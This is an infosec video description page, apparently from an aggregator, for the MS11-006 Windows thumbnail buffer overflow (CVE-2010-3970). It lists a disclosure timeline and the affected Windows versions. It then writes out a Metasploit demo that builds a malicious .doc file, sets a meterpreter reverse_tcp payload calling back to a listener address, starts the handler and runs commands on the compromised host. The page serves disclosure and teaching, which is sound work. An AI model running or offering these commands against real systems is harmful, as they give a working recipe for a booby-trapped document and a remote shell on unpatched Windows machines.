Description: Timeline :
Vulnerability disclosed by Moti & Xu Hao on POC2010 the 2010-12-15
CVE registered the 2010-12-22
PoC provided by Metasploit team the 2011-01-04
PoC provided by:
Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck
Reference(s) :
CVE-2010-3970
MSA-2490606
MS11-006
Affected versions :
Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3
Description :
This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the "Thumbnails" view.
Metasploit demo :
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
ipconfig
Tags: metasploit , windows , thumbnails , 0day , exploit , microsoft , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.